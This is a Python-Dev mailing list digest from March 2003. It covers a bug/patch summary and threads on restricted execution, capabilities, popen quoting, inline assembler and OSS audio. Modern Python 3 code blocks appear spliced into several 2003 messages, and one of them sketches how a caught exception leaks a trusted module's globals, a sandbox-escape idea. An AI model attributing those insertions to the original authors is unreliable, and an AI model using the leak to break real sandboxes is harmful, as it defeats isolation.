Date: Sun, 9 Mar 2003 07:00:22 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303091300.h29D0MAE015342@manatee.mojam.com>

Bug/Patch Summary
-----------------

349 open / 3432 total bugs (+7)
124 open / 2011 total patches (+1)

New Bugs
--------

Move modules out of Carbon (2003-03-02)
	http://python.org/sf/696206
PyMac_GetFSRef should accept unicode (2003-03-02)
	http://python.org/sf/696253
Carbon.CF module needs new style classes (2003-03-03)
	http://python.org/sf/696527
Python 2.4: Warn about omitted mutable_flag. (2003-03-03)
	http://python.org/sf/696535
How to make a class iterable using a member generator. (2003-03-03)
	http://python.org/sf/696777
CGIHTTPServer doesn't quote arguments correctly on Windows. (2003-03-03)
	http://python.org/sf/696846
gensuitemodule overhaul (2003-03-04)
	http://python.org/sf/697179
string.strip implementation/doc mismatch (2003-03-04)
	http://python.org/sf/697220
test_posix fails: getlogin (2003-03-04)
	http://python.org/sf/697556
string.atoi function causing TypeError (2003-03-04)
	http://python.org/sf/697591
Mention gmtime in Chapter 6.9 "Time access and conversions" (2003-03-05)
	http://python.org/sf/697983
Move gmtime function from calendar to time module (2003-03-05)
	http://python.org/sf/697985
Clarify timegm documentation (2003-03-05)
	http://python.org/sf/697986
Clarify daylight variable meaning (2003-03-05)
	http://python.org/sf/697988
Clarify mktime semantics (2003-03-05)
	http://python.org/sf/697989
Document strptime limitation (2003-03-05)
	http://python.org/sf/697990
__file__ attribute missing from dynamicly loaded module (2003-03-05)
	http://python.org/sf/698282
urllib2 Request.get_host and proxies (2003-03-05)
	http://python.org/sf/698374
Tk 8.4.2 and Tkinter.py _substitue function (2003-03-05)
	http://python.org/sf/698517
list.index() bhvr change > python2.x (2003-03-06)
	http://python.org/sf/698561
imaplib: parsing INTERNALDATE (2003-03-06)
	http://python.org/sf/698706
Provide "plucker" format docs. (2003-03-06)
	http://python.org/sf/698900
Error using Tkinter embeded in C++ (2003-03-06)
	http://python.org/sf/699068
HTMLParser crash on glued tag attributes (2003-03-06)
	http://python.org/sf/699079
Tutorial uses omitted slice indices before explaining them (2003-03-06)
	http://python.org/sf/699237
builtin type inconsistency (2003-03-07)
	http://python.org/sf/699312
ncurses/curses on solaris (2003-03-07)
	http://python.org/sf/699379
refcount problem involding debugger (2003-03-07)
	http://python.org/sf/699594
MIMEText's c'tor adds unwanted trailing newline to text (2003-03-07)
	http://python.org/sf/699600
Erroneous error message from IDLE (2003-03-07)
	http://python.org/sf/699630
Canvas Widget origin is off-screen (2003-03-07)
	http://python.org/sf/699816
Obscure error message (2003-03-08)
	http://python.org/sf/699934
site.py should ignore trailing CRs in .pth files (2003-03-08)
	http://python.org/sf/700055

New Patches
-----------

allow proxy server authentication with pimp (2003-03-02)
	http://python.org/sf/696392
fix bug #670311: sys.exit and PYTHONINSPECT (2003-03-04)
	http://python.org/sf/697613
optparse unit tests + fixes (2003-03-05)
	http://python.org/sf/697939
optparse OptionGroup docs (2003-03-05)
	http://python.org/sf/697941
docs for hotshot module (2003-03-05)
	http://python.org/sf/698505
ZipFile - support for file decryption (2003-03-06)
	http://python.org/sf/698833

Closed Bugs
-----------

threads within an embedded python interpreter (2000-11-03)
	http://python.org/sf/221327
unreliable file.read() error handling (2002-02-23)
	http://python.org/sf/521782
Flawed fcntl.ioctl implementation. (2002-05-14)
	http://python.org/sf/555817
Get rid of etype struct (2002-08-06)
	http://python.org/sf/591586
email 2.4.3 pkg mail header error (2002-10-16)
	http://python.org/sf/624254
email incompatibility upgrading to 2.2.2 (2002-10-20)
	http://python.org/sf/626119
HeaderParseError: no header value (2002-11-04)
	http://python.org/sf/633550
Optional argument for dict.pop() method (2002-11-17)
	http://python.org/sf/639806
email.Header misparses mixed headers (2002-11-18)
	http://python.org/sf/640110
datetime docs need review, LaTeX (2002-12-16)
	http://python.org/sf/654846
long(3.1415) gives zero on Solaris 8 (2003-02-03)
	http://python.org/sf/679520
Header loses lines, formats strangely (2003-02-03)
	http://python.org/sf/679827
Carbon.CF.CFString should require ASCII (2003-02-07)
	http://python.org/sf/682215
email: preamble must be \n terminated (2003-02-07)
	http://python.org/sf/682504
socket module on solaris (2003-02-11)
	http://python.org/sf/684903
IDE asks for attention when quitting (2003-02-11)
	http://python.org/sf/684975
robotparser only applies first applicable rule (2003-02-20)
	http://python.org/sf/690214
register command not listed in command line help (2003-02-20)
	http://python.org/sf/690389
can't build bsddb for 2.3a2 (2003-02-20)
	http://python.org/sf/690419
LibRef 4.2.1: {m,n} description update (2003-02-23)
	http://python.org/sf/692016
tkinter.createfilehandler dumps core (2003-02-24)
	http://python.org/sf/692416
licence allowed, but doesn't work (2003-02-25)
	http://python.org/sf/693470
Can't multiply str and bool (2003-02-26)
	http://python.org/sf/693955
email.Parser trashes header (2003-02-26)
	http://python.org/sf/693996
os.popen() hangs on {Free,Open}BSD (2003-02-26)
	http://python.org/sf/694062
complex_new does not always respect subtypes (2003-03-01)
	http://python.org/sf/695651

Closed Patches
--------------

More DictMixin (2003-01-14)
	http://python.org/sf/667730
test_pty hanging on hpux11 (2003-01-20)
	http://python.org/sf/671384
Make the default encoding provided on Windows (2003-01-21)
	http://python.org/sf/671666
unicode support for os.listdir() (2003-02-09)
	http://python.org/sf/683592
Allow freeze to exclude implicits (2003-02-11)
	http://python.org/sf/684677
Use datetime in _strptime (2003-02-23)
	http://python.org/sf/691928
fix for bug 639806: default for dict.pop (2003-02-26)
	http://python.org/sf/693753


From mats@laplaza.org  Sat Mar  8 22:31:25 2003
From: mats@laplaza.org (Mats Wichmann)
Date: Sat, 08 Mar 2003 15:31:25 -0700
Subject: [Python-Dev] Re: acceptability of asm in python code?
In-Reply-To: <20030308170008.25630.88365.Mailman@mail.python.org>
Message-ID: <5.1.0.14.1.20030308152850.01ee2328@mail.laplaza.org>

 >
 >In the BINARY_ADD opcode, and in most arithmetic opcodes, there is a line
 >that checks for overflow that looks like this:
 >
 >if ((i^a) < 0 && (i^b) < 0) goto slow_add;
 >
 >I got a small speedup by replacing this with a macro defined thusly:
 >
 >#if defined(_MSC_VER) and defined(_M_IX86)
 >#define IF_OVERFLOW_GOTO(X) __asm { jo X };
 >#else
 >#define IF_OVERFLOW_GOTO(X) if ((i^a) < 0 && (i^b) < 0) goto X;
 >#endif
 >
 >Would this case be an acceptable use of snippets of inline assembler?

I'd personally be more comfortable if we didn't go
down that road; there are compilers that don't support
asm's (e.g. the Intel Linux compilers).


From pedronis@bluewin.ch  Sun Mar  9 19:09:33 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 9 Mar 2003 20:09:33 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
Message-ID: <05a701c2e66f$6c001be0$6d94fea9@newmexico>

From: "Samuele Pedroni" <pedronis@bluewin.ch>
> From: "Jim Fulton" <jim@zope.com>
> > For example, you can't proxy exceptions without
> > breaking exception handling. In Zope, we rely on restricted execution to
> > prevent certain kinds of introspection on exceptions and exception classes.
> > In Zope, we also don't proxy None, because None is usually checked for
> > identity. We also don't proxy strings and numbers.
> >
> That was a question I was asking myself about proxies: exception handling.
> But I never had the time to play with it to check.
>
> Does that mean that restricted code can get unproxied instances of classic
> classes as caught exceptions?

Maybe the question was unclear, but it was serious. What I was asking is
whether some restricted code can do:

try:
    ...  # deliberate code to force an exception
except Exception, e:
    ...

so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this
can be the case...

Then, to be (likely) on the safe side, the definitions of all the classes that
e could be an instance of, e.g.

class MyExc(Exception):
    ...


ought to be executed _in restricted mode_, or be "trivial/empty": something
like

class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

    def __str__(self):
        return self.message

is already too much rope.

Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
instances, an unproxied instance of MyExc, if MyExc was defined outside of
restricted execution, can be used to break out of restricted execution.
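
One way to see what an unproxied instance carries with it, sketched in
present-day Python 3 with no restrictions in force. This is not a working
escape from rexec (restricted mode blocked some of these attributes) and not
necessarily the route meant above; the names TRUSTED_SOURCE, trusted_globals,
risky and untrusted are invented. The separate namespace stands in for code
defined outside of restricted execution.

```python
TRUSTED_SOURCE = '''
class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

    def __str__(self):
        return self.message


def risky():
    raise MyExc("boom")
'''

# Namespace of the "trusted" module in which MyExc is defined.
trusted_globals = {"SECRET": "only trusted code should see this"}
exec(TRUSTED_SOURCE, trusted_globals)


def untrusted(call):
    """Force an exception, catch it unproxied, and follow it back to its module."""
    try:
        call()
    except Exception as e:
        # The methods of e's class still reference the defining module's globals.
        return type(e).__init__.__globals__


leaked = untrusted(trusted_globals["risky"])
```

Even this small class hands the catcher a reference to functions that run
with the defining module's globals, which is the kind of rope at issue.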

regards.


From Jack.Jansen@oratrix.com  Sun Mar  9 21:24:37 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Sun, 9 Mar 2003 22:24:37 +0100
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <d6l2alw2.fsf@python.net>
Message-ID: <87C29952-5275-11D7-B151-000A27B19B96@oratrix.com>

On Friday, Mar 7, 2003, at 22:48 Europe/Amsterdam, Thomas Heller wrote:
> In distutils we had a similar problem. I don't remember the details
> at the moment exactly, but I think enclosing sys.executable in double
> quotes *only* when it contains spaces should do the trick.

But only spaces may not be good enough. What I think we really want is a
function that makes any string safe for popen/exec/shell script (or raises
an exception if it can't be done?). As this function will have to be
platform-specific it seems os.path would be a suitable place for it.
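
A minimal sketch of the kind of helper described above, assuming a modern
Python 3 standard library (shlex.quote and subprocess.list2cmdline did not
exist when this thread was written). The name shell_safe is hypothetical, and
the Windows branch only follows the MS C runtime's argument rules, not
cmd.exe's metacharacter rules, so it is not a complete answer there.

```python
import os
import shlex
import subprocess


def shell_safe(arg):
    """Quote arg so a command interpreter treats it as a single word.

    Hypothetical helper; raises ValueError for input that cannot be quoted.
    """
    if "\0" in arg:
        raise ValueError("NUL bytes cannot be passed on a command line")
    if os.name == "nt":
        # Assumption: the target program parses its command line the way
        # the MS C runtime does. This does not neutralise cmd.exe syntax.
        return subprocess.list2cmdline([arg])
    # POSIX shells: wrap in single quotes when anything unsafe is present.
    return shlex.quote(arg)
```

Where possible, passing an argument list to a process-spawning call and not
involving a shell at all sidesteps the quoting question entirely.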

Or would this give a false sense of security to people who write cgi scripts
or something and then suddenly get hit by an IFS hack or similar trick?
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma Goldman -


From logi.stix@verizon.net  Sun Mar  9 21:47:10 2003
From: logi.stix@verizon.net (logistix)
Date: Sun, 9 Mar 2003 16:47:10 -0500
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <20030308143843.GB1025@unpythonic.net>
Message-ID: <000001c2e685$7114e9b0$20bba8c0@XP>


> -----Original Message-----
> From: python-dev-admin@python.org 
> [mailto:python-dev-admin@python.org] On Behalf Of Jeff Epler
> Sent: Saturday, March 08, 2003 9:39 AM
> To: Tim Peters
> Cc: PythonDev
> Subject: Re: [Python-Dev] test_popen broken on Win2K
> 
> 
> When I tackled this problem for a program of mine, I ended up 
> making sure that I always used the "short filename" form for 
> the program to be executed.  This way, there were no spaces 
> in the filename and no need to quote them.
> 
> However, the function I used to do this comes from 
> win32<something>, so test_popen can't use it.  Nor can Python 
> fix this up for all users of
> os.popen()
> 
> Jeff
> 

Note that there's a policy/reghack that disables short filenames.  This
allegedly improves file IO by up to 25 % and is commonly recommended as
a performance enhancement for domains that only have W2K + servers and
clients.  It's also part of Microsoft's Server lockdown documentation.
I believe the official stance by Microsoft itself is that short
filenames are a legacy feature.


From tim.one@comcast.net  Sun Mar  9 21:53:51 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 09 Mar 2003 16:53:51 -0500
Subject: [Python-Dev] acceptability of asm in python code?
In-Reply-To: <000501c2e5f8$c384b6e0$6401a8c0@damien>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEOHEAAB.tim.one@comcast.net>

[damien morton]
> Its arguable which is more obscure, the x86 assembly instruction "jo"
> (jump if overflow), or the xor trickery in C. <wink>

It's not just the assembler, it's also the world of delicate assumptions
about how the compiler interleaves generated C code with the forced inline
assembler, how that affects optimization in general (see Chris Tismer's post
about that), and how brittle that all is.  One example of the latter:  an
idea that resurfaces from time to time is to make Python "short ints" the
platform spelling of a 64-bit int.  The C overflow-checking code wouldn't be
affected by that (part of the reason it's obscure is that it makes no
assumption about the size of a Python int).  With the inline assembler,
though, it would just break -- jo would pick up some accidental setting of
the overflow flag under MSVC, or we'd have to arrange to generate __int64
addition code that set the flag the way the macro expects.  For a little
speedup on the sole operation(s) it targets, it's just not worth the ongoing
puzzles.
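
For readers unfamiliar with the "xor trickery", here is a rough Python
emulation of the idea. It is a sketch, not the CPython source: Python integers
never overflow, so the hypothetical helper wrap() simulates a fixed-width
two's-complement C integer, and the bits parameter is an assumption added for
illustration. The test itself says an addition overflowed exactly when the sign
of the result differs from the sign of both operands, which is why it does not
care how wide the integer is.

```python
def wrap(value, bits):
    """Reduce value to a signed two's-complement integer of the given width."""
    value &= (1 << bits) - 1
    if value >> (bits - 1):      # top bit set means negative
        value -= 1 << bits
    return value


def add_overflows(a, b, bits=32):
    """Return True if a + b would overflow a signed integer of `bits` bits."""
    x = wrap(a + b, bits)        # what the C addition would produce
    # x ^ a is negative only when x and a have different signs.
    return (x ^ a) < 0 and (x ^ b) < 0
```

The same function works unchanged for bits=64, which mirrors the point about
making short ints a 64-bit type.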

BTW, I'm not sure it's possible to buy a PC anymore less than twice as fast
as the one I'm using right now <wink>.

> I take your point, though, about there being no assembly in python now.

There's one place I wish there were:  I wish Jeremy had time to fold in his
bit of assembler to read the Pentium's clock register.  That's a wonderful
facility we can't get at now, and the assembler would be limited to a tiny
and isolated function.


From greg@cosc.canterbury.ac.nz  Sun Mar  9 22:42:44 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 10 Mar 2003 11:42:44 +1300 (NZDT)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>

> E.g. I might have a service configuration registry object.  The object
> behaves roughly like a dictionary.  A certain user may be given
> read-only access to the registry.

Maybe every Python object should have a flag which
can be set to prevent introspection -- like the current
restricted execution mechanism, but on a per-object
basis. Then any object could be used as a capability.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Sun Mar  9 22:52:39 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 10 Mar 2003 11:52:39 +1300 (NZDT)
Subject: [Python-Dev] test_popen broken on Win2K
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEMGFBAA.tim.one@comcast.net>
Message-ID: <200303092252.h29Mqdk17019@oma.cosc.canterbury.ac.nz>

> Those would be quite different functions, then, unless you proposed to have
> Python interpret native shell metacharacters on its own too (e.g., set up
> pipes, do the indicated file redirections, interpolate envars, and fake
> whatever other shell gimmicks people may use).

What we need is a function which does all those things,
but uses some way of specifying them *other* than shell
metacharacters. E.g.

  os.plumb(("sed", "-e", "s/dead/resting/", "parrots"),
    ("grep", "norwegian"), output = myfile)
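
One way such a function might look today is sketched below, assuming the
Python 3 subprocess module (which postdates this message). The name plumb and
its signature are taken loosely from the example above and remain hypothetical;
only pipes and output redirection are handled, not the other shell features
mentioned.

```python
import subprocess
import sys


def plumb(*commands, output=None):
    """Run commands as a pipeline without involving a shell.

    Each command is a sequence of argv strings. The last command writes to
    `output` if given; otherwise its stdout is captured and returned as bytes.
    """
    if not commands:
        raise ValueError("at least one command is required")
    procs = []
    upstream = None
    for index, argv in enumerate(commands):
        is_last = index == len(commands) - 1
        sink = output if (is_last and output is not None) else subprocess.PIPE
        proc = subprocess.Popen(list(argv), stdin=upstream, stdout=sink)
        if upstream is not None:
            upstream.close()     # only the child keeps the read end open
        upstream = proc.stdout
        procs.append(proc)
    captured = procs[-1].communicate()[0]
    for proc in procs[:-1]:
        proc.wait()
    return captured
```

Because every argument is passed as a separate list element, no quoting of
spaces or metacharacters is needed.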

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Mon Mar 10 00:10:51 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 19:10:51 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Mon, 10 Mar 2003 11:42:44 +1300."
 <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
Message-ID: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>

> Maybe every Python object should have a flag which
> can be set to prevent introspection -- like the current
> restricted execution mechanism, but on a per-object
> basis. Then any object could be used as a capability.

I think the capability folks would object to calling it a capability
though. :-)

Two questions:

- Where to store the flag?  It probably would cost 4 bytes per object.

- Which attributes are considered introspective?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 01:08:20 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 20:08:20 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sun, 09 Mar 2003 07:48:31 EST."
 <E18s0EB-0006la-00@localhost>
References: <E18s0EB-0006la-00@localhost>
Message-ID: <200303100108.h2A18KS06619@pcp02138704pcs.reston01.va.comcast.net>

[Zooko]
> > 2.  Mandatory private data (accessible only by the object itself).
> > Normal Python doesn't have mandatory private data.  If I
> > understand correctly, both rexec and proxies (attempt to) provide
> > this.  They also attempt to provide another safety feature: a
> > wrapper around the standard library and builtins that turns off
> > access to dangerous features according to an overridable security
> > policy.

[Zooko, responding to himself]
> Perhaps it is that "restricted execution" is designed to provide
> private data, by disabling certain introspection features, and
> "rexec" and "proxies" are designed to provide the wrapper feature?

Not really.  Restricted execution doesn't provide private data in
general: all instance variables of all user-defined classes are
accessible to restricted code.  However, restricted execution prevents
introspection paths that can lead from a function or bound method to
its globals or object, respectively, thereby effectively turning
functions and bound methods into capabilities.

Security proxies can be used to enforce private data, however.

The "rexec" module is used to wrap the standard library.  Its approach
is the following, implemented by overriding __import__:

- For modules written in Python, it gives the untrusted code a
  separate copy of the module, so that the untrusted code can't mess
  with module globals that might have a meaning to the trusted kernel.

- For extension modules (i.e. modules written in C), it has a list of
  trusted modules, it provides wrappers for some others that only
  allow a safe subset, and all others are completely off limits.

It also wraps open() and a few other built-ins.
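
The __import__ override can be sketched roughly as follows. This is an
illustration of the idea in Python 3, not the rexec implementation: the names
ALLOWED, guarded_import and run_untrusted are hypothetical, the sketch does not
give untrusted code its own copy of Python modules, and replacing __builtins__
this way is not a security boundary in current CPython.

```python
import builtins

# Assumption: a tiny list of modules considered safe, for illustration only.
ALLOWED = frozenset({"math", "string"})


def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Refuse any import whose top-level package is not in ALLOWED."""
    root = name.partition(".")[0]
    if level != 0 or root not in ALLOWED:
        raise ImportError(f"import of {name!r} is not permitted")
    return builtins.__import__(name, globals, locals, fromlist, level)


def run_untrusted(source):
    """Execute source with a reduced set of built-ins and a guarded import."""
    env = {
        "__builtins__": {
            "__import__": guarded_import,   # consulted by the import statement
            "abs": abs,
            "len": len,
        }
    }
    exec(source, env)
    return env
```

For example, run_untrusted("import math") succeeds while
run_untrusted("import os") raises ImportError.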

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 01:10:36 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 09 Mar 2003 20:10:36 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: "Your message of Sun, 09 Mar 2003 07:40:23 EST."
 <E18s06J-0006ZD-00@localhost>
References: <E18s06J-0006ZD-00@localhost>
Message-ID: <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net>

> 3.  A standard library that follows the Principle of Least
> Privilege.  That is, a library full of tools that you can extend to
> an object in order to empower it to do specific things
> (e.g. __builtin__.abs(), os.times(), ...) without thereby also
> empowering it to do other things (e.g. __builtin__.file(),
> os.system(), ...).  Python doesn't have such a library.
> 
> Now the Principle of Least Privilege approach to making a library
> safe is very different from the "sandbox" approach.  The latter is
> to remove all "dangerous" tools from the toolbox (or in our case, to
> have them dynamically disabled by the "restricted" bit which is
> determined by an overridable policy).  The former is to separate the
> tools so that dangerous ones don't come tied together with common
> ones.  The security policy, then, is expressed by code that grants
> or withholds capabilities (== references) rather than by code that
> toggles the "restricted" bit.

This sounds interesting, but I'm not sure I follow it.  Can you
elaborate by giving a couple of examples?

> Of course, you can start by denying the entire standard library to
> restricted code, and then incrementally refactor the library or wrap
> it in Least-Privilege wrappers.
> 
> Until you have a substantial Least-Privilege-respecting library you
> can't gain the big benefit of capabilities -- code which is capable
> of doing something useful without also being capable of doing harm.
> (You can gain the "sandbox" style of security -- code which is
> incapable of doing anything useful or harmful.)
> 
> This requirement also means that there can be no "ambient authority"
> -- authority that an object receives even if its creator has given
> it no references.

Again, I would perhaps understand this if you gave a specific
example.  Is it like suid in Unix?

> Regards,
> 
> Zooko
> 
> P.S.  I learned this three-part paradigm from Mark Miller whose
> paper with Chip Morningstar and Bill Frantz articulates it in more
> detail:
> 
> http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop

The paper didn't seem immediately relevant, or perhaps it's too
long-winded and I gave up before it touched upon the relevant
stuff. :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Mon Mar 10 02:16:47 2003
From: gward@python.net (Greg Ward)
Date: Sun, 9 Mar 2003 21:16:47 -0500
Subject: [Python-Dev] Where is OSS used?
Message-ID: <20030310021647.GA2378@cthulhu.gerg.ca>

I'm working on docs for ossaudiodev, and I thought I'd ask here before
bugging the OSS people: does anyone know which operating systems use OSS
(Open Sound System) as the standard audio interface?  I know Linux up to
2.4 does, as do some (all?) versions of FreeBSD.

Do any of the other BSD flavours (OpenBSD, NetBSD, ...) use OSS
out-of-the-box?  (If you have access to a FooBSD box, take a look for
/usr/include/*/soundcard.h -- if it looks like this:

"""
#ifndef SOUNDCARD_H
#define SOUNDCARD_H
/*
 * Copyright by Hannu Savolainen 1993-1997
[...]
"""

then it's OSS.)
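
The check above could be scripted along these lines. It is only a sketch: the
function names are hypothetical, and matching on the include guard and the
copyright holder's name is a heuristic based on the excerpt quoted above.

```python
import glob
import os


def looks_like_oss(header_text):
    """Heuristic: does this soundcard.h excerpt resemble the OSS header?"""
    return "SOUNDCARD_H" in header_text and "Hannu Savolainen" in header_text


def find_oss_headers(include_root="/usr/include"):
    """Return the paths of <include_root>/*/soundcard.h files that match."""
    matches = []
    pattern = os.path.join(include_root, "*", "soundcard.h")
    for path in glob.glob(pattern):
        with open(path, errors="replace") as handle:
            if looks_like_oss(handle.read(2048)):   # the marker is near the top
                matches.append(path)
    return sorted(matches)
```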

Anyone know precisely which 2.5.x version of Linux dropped OSS in favour
of ALSA?

Please reply directly to me -- my python-dev subscription is temporarily
disabled because I went on holiday a week ago, and still haven't caught
up with my other email backlog...

Thanks --

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
I just read that 50% of the population has below median IQ!


From thomas@xs4all.net  Mon Mar 10 09:31:24 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 10 Mar 2003 10:31:24 +0100
Subject: [Python-Dev] Where is OSS used?
In-Reply-To: <20030310021647.GA2378@cthulhu.gerg.ca>
References: <20030310021647.GA2378@cthulhu.gerg.ca>
Message-ID: <20030310093124.GM2112@xs4all.nl>

On Sun, Mar 09, 2003 at 09:16:47PM -0500, Greg Ward wrote:
> I'm working on docs for ossaudiodev, and I thought I'd ask here before
> bugging the OSS people: does anyone know which operating systems use OSS
> (Open Sound System) as the standard audio interface?  I know Linux up to
> 2.4 does, as do some (all?) versions of FreeBSD.

I'd say 'recent'. I don't recall when it was added, definitely a while back,
but the oldest machine I have (FreeBSD 4.2) has OSS/Free. From googling I
get the impression that it's been there since 3.x, so 'recently' definitely
holds. Likewise, googling shows OpenBSD also uses OSS/Free -- the commercial
OSS installation manual tells you to remove references to OSS/Free from the
kernel :)

And there's a boatload of supported platforms in the commercial OSS of
course, see www.opensound.com. But I don't suggest we try and plug OSS :)

> Anyone know precisely which 2.5.x version of Linux dropped OSS in favour
> of ALSA?

OSS wasn't dropped (not yet anyway), ALSA was added. Also, ALSA has an OSS
emulation mode, so I think it's safe to say you need to 'have OSS or ALSA
with OSS API emulation' enabled.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From ping@zesty.ca  Mon Mar 10 10:51:40 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 04:51:40 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>

Ben Laurie wrote:
> BTW, if you would like to explain why you don't think bound methods are
> the way to go on python-dev, I'd love to hear it.

Guido van Rossum wrote:
> Using capabilities, I would have to hand her
> a bunch of capabilities for various methods: __getitem__, has_key,
> get, keys, items, values, and many more.  Using proxies I can simply
> give her a read-only proxy for the object.  So proxies are more
> powerful.

There seems to be a persistent confusion here that i would like
to dispel: a capability is not a single lambda.

Guido's paragraph, above, seems to believe that it is.  In fact,
the pattern he described is a common and powerful way of using
capabilities.  A capability is just an unforgeable object reference.
In a pure capability system, the only thing you can do with a
capability is to call methods on it (or, if you prefer, all you
can do is send messages to it).  Interposing an object to expose
only a subset of another object's API, such as a read-only subset,
is exactly the power capabilities give you.

It seems to me that the "rexec vs. proxy" debate is really about
a very different question: How do we get from Python's currently
promiscuous objects to properly restricted objects?

(Once we have properly restricted objects in either fashion, yes,
definitely, using proxies to restrict access is a great technique.)

If i understand correctly, the "proxy" answer is "we create a
special wrapper object, then the programmer has to individually
wrap any object they want to be secure".  And the "rexec" answer
is "we create an interpreter mode in which all objects are secure".

I think the latter is far better.  To have any sort of real chance
at establishing security, you have to start from a place where
everything is secure, instead of starting from a place where
everything is insecure and you have to individually secure every
single object with its own wrapper.

The eventual ideal is to have a system where all objects are
"pure" objects (i.e. non-introspectable capabilities) by default.
Anyone wanting to do introspection would simply have to obtain
the "introspect" capability from a privileged place (e.g. sys).
For example,

    class Foo:
        pass

    print Foo.__dict__                  # fails

    from sys import introspect
    print introspect(Foo).__dict__      # succeeds

When running the interpreter in secure mode, "introspect"
would just be missing from the sys module (again, ideally
sys.introspect wouldn't exist by default, and a command-line
option would turn it on, but i realize that's far away).

This would have the effect of the "introspectable flag" that
Guido mentioned, but without expending any storage at all,
until you actually needed to introspect something.


-- ?!ng


From ping@zesty.ca  Mon Mar 10 10:55:42 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 04:55:42 -0600 (CST)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E6A31EA.4090609@algroup.co.uk>
Message-ID: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>

On Sat, 8 Mar 2003, Ben Laurie wrote:
> >>c) Wrap or replace some of the existing libraries, certify that others
> >>are "safe"
> >
> > This should only be necessary for (core and 3rd party) extension
> > modules.  The rexec module has a framework for this.
> >
> >>It looks to me like a and b are shared with proxies, and c would be
> >>different, by definition. Is there anything else? Am I on the wrong track?
> >
> > I don't know why you think (c) is different.
>
> Because with proxies you'd wrap with proxies, and with capabilities
> you'd wrap with capabilities. Or do you think there's a way that would
> work for both (which would, of course, be great)?

This doesn't make any sense to me.  The standard libraries would provide
proxy wrappers in either case.  The rexec vs. proxy issue doesn't enter
into it.

By the way -- to avoid confusion between "proxies used to wrap
unrestricted objects in order to make them into secure objects" and
"proxies used to reduce the interface of an existing secure object",
let's call the first "proxy" (as has been used in the "rexec vs. proxy"
discussion so far), and call the second a "facet" (which is the term
commonly used when capabilities people talk about reducing an interface).
We often talk about providing, say, a "read-only facet" on an object.
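
A read-only facet on a dictionary-like object might be sketched as below. The
name read_only_facet is hypothetical. Note the assumption that makes this only
an illustration: in ordinary CPython the wrapped mapping can still be reached
by introspecting the closure, so the facet is only as strong as the underlying
object model.

```python
def read_only_facet(mapping):
    """Return an object exposing only the read-only part of mapping's API."""

    class Facet:
        __slots__ = ()           # no instance attributes to poke at

        def __getitem__(self, key):
            return mapping[key]

        def __contains__(self, key):
            return key in mapping

        def __len__(self):
            return len(mapping)

        def get(self, key, default=None):
            return mapping.get(key, default)

        def keys(self):
            return list(mapping.keys())

    return Facet()
```

The holder of the facet sees later changes made by the owner of the mapping,
but has no method through which to make changes of its own.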


-- ?!ng


From ben@algroup.co.uk  Mon Mar 10 11:02:26 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 11:02:26 +0000
Subject: [Python-Dev] Capabilities
